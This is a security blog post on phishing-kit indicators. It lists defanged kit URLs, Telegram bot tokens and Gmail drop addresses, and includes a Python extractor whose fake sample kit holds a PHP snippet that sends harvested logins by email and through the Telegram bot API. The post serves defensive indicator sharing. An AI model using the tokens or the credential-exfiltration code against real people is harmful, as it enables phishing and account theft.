Why aren’t criminals’ email accounts closed?

Free time is getting scarcer, but I still try to dedicate at least a couple of hours every week to analysing the Matrix evidence. Part of that time goes to analysing phishing kits and sharing the email and Telegram token indicators on my public IoC repo: https://github.com/ecarlesi/ioc.git

This analysis raises a spontaneous question: why do the same accounts remain active over time? Does nobody notice that they are being used for illicit purposes?

The obvious answer might be that Telegram is based in Dubai and was founded by a Russian, so maybe preventing or mitigating fraud is not at the forefront of their minds. Maybe. Let’s say the same goes for Yandex, since they are Russian. Maybe. What I don’t understand, though, is why Gmail and Yahoo accounts aren’t blocked either, just to name two non-Russian companies.

Take the segdairo at gmail dot com account, for example. I personally found it in 5 different attacks, the first one dating back to May 13, 2024.

Later I found it in other kits, within which I identified further indicators:

  • hxxps://digitalbankingsonoraweb[.]online/verify/SONORA%20CU.zip contains the Telegram token 5453712056:AAE5M0Nnbcm0eanesMhIV62mNU_WgM20A6c
  • hxxps://dlgitaldove88system[.]online/FIRST%20FIFELITY%20BANK.zip contains the Telegram token 7223951606:AAHTkeSZ1UFauExPuwkzK_wfORFsldNFbnA
  • hxxps://digitalconnectfirstnow[.]online/FIRST%20UNITED%20BANK.zip contains the email account hakekelly07 at gmail dot com and the Telegram token 7103172103:AAFibon0scauwaJ6gnsY3vBfQ7e13IST9QY
  • hxxps://online-ctricbonline[.]cfd/cancel/login%20(1).zip contains the Telegram token 6318747656:AAFlcQchhlCb9DNkfpXvCEKXhSr0yINXgQc
  • hxxps://dashboardverfedconnect[.]online/VERMONT%20FCU.zip contains the Telegram token 7482950914:AAEupDhXYLKY_vvZHvwiCdgG_A2y4W5Jgn8
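How indicators like the ones listed above can be pulled out of a kit archive, and how a reused drop address ties otherwise unrelated kits together, shown as an added example (not the author's tooling). The kit contents, bank names, bot tokens and email addresses below are constructed and fake; only the token shape (numeric bot id, colon, 35-character secret) and the "sender e-mail plus Telegram bot" exfiltration pattern follow what the real kits above embed.

```python
"""Extract exfiltration indicators from phishing kit zips and pivot on shared ones.

Added example with constructed, fake kits; not code from the author's IoC repo.
"""
import io
import re
import zipfile
from collections import defaultdict

# Telegram bot token: numeric bot id, colon, 35-character secret (the tokens on
# the page have 10-digit ids; 8-10 is allowed here to be safe).
TELEGRAM_TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9_-])(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])"
)
EMAIL_RE = re.compile(
    r"\b([A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,})\b"
)
# Kits are mostly PHP/HTML/JS; images and other binaries are skipped.
TEXT_SUFFIXES = (".php", ".html", ".htm", ".js", ".txt", ".json", ".ini")


def extract_indicators(zip_bytes: bytes) -> dict:
    """Scan every text file in a kit archive; return sorted tokens and e-mails."""
    found = {"telegram": set(), "email": set()}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as kit:
        for info in kit.infolist():
            if info.is_dir() or not info.filename.lower().endswith(TEXT_SUFFIXES):
                continue
            text = kit.read(info).decode("utf-8", errors="replace")
            found["telegram"].update(TELEGRAM_TOKEN_RE.findall(text))
            found["email"].update(EMAIL_RE.findall(text))
    return {kind: sorted(values) for kind, values in found.items()}


def defang_email(address: str) -> str:
    """Defang for publication, in the same style used in the post."""
    local, domain = address.rsplit("@", 1)
    return f"{local} at {domain.replace('.', ' dot ')}"


def shared_indicators(kits: dict) -> dict:
    """Map (kind, value) -> kit names, keeping only indicators seen in more than one kit."""
    seen = defaultdict(list)
    for name, blob in kits.items():
        indicators = extract_indicators(blob)
        for kind in ("telegram", "email"):
            for value in indicators[kind]:
                seen[(kind, value)].append(name)
    return {key: names for key, names in seen.items() if len(names) > 1}


# --- constructed sample kits (fake values, hypothetical file layout) ---
FAKE_TOKEN_A = "1234567890:AAEXAMPLE" + "0" * 26  # token shape only, not a real bot
FAKE_TOKEN_B = "9876543210:AAEXAMPLE" + "1" * 26
DROP_EMAIL = "drop.example@gmail.com"            # the reused "drop" mailbox


def build_kit(token: str, drop: str, bank: str) -> bytes:
    """Build an in-memory zip resembling a bank-lure kit: PHP exfil script, HTML lure, a PNG."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(f"{bank}/send.php", (
            "<?php\n"
            f'$token = "{token}";\n'
            f'$to = "{drop}";\n'
            '$msg = "user=".$_POST["user"]."&pass=".$_POST["pass"];\n'
            'mail($to, "New login", $msg);\n'
            'file_get_contents("https://api.telegram.org/bot".$token'
            '."/sendMessage?chat_id=".$chat."&text=".urlencode($msg));\n'
        ))
        # The lure page carries the bank's own (fake) contact address: it is
        # extracted too, and must be triaged apart from the drop address.
        z.writestr(f"{bank}/index.html",
                   f"<h1>{bank} Online Banking</h1>Contact: support@{bank.lower()}.test")
        z.writestr(f"{bank}/logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    return buf.getvalue()


if __name__ == "__main__":
    kits = {
        "SonoraCU": build_kit(FAKE_TOKEN_A, DROP_EMAIL, "SonoraCU"),
        "VermontFCU": build_kit(FAKE_TOKEN_B, DROP_EMAIL, "VermontFCU"),
    }
    for (kind, value), names in shared_indicators(kits).items():
        shown = defang_email(value) if kind == "email" else value
        print(f"{kind}: {shown} links kits {', '.join(names)}")
```

Each kit gets its own bot token, so the tokens never link kits; the drop mailbox does, which is exactly the pivot that turned one Gmail address into five attacks above. The lure page's own contact address is also extracted, so the output still needs a human to separate the attacker's drop from the impersonated bank's text.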

Not understanding why email accounts are not blocked even when they are clearly involved in illicit activities, I tried to find out how to report a criminal email account. Searching the internet, I found some instructions from Google about how to report an email you have received. However, I did not find how to report an email account involved in illicit activities without having received any email from it in my Gmail account. I also found directions regarding Google Workspace accounts, which are very convenient, but that is not the case here.

I finally found a link to the Internet Crime Complaint Center (ic3[.]gov). There is a form to report the event. It is now dinner time; given the length of the form, maybe I will do it after dinner.

Here I found something interesting: the Government explains how to recognize a legitimate Government domain: there is the “.gov” and the padlock that indicates the use of https…

I would say that does not work very well, since every day there are thousands of new domains that meet these requirements 😀
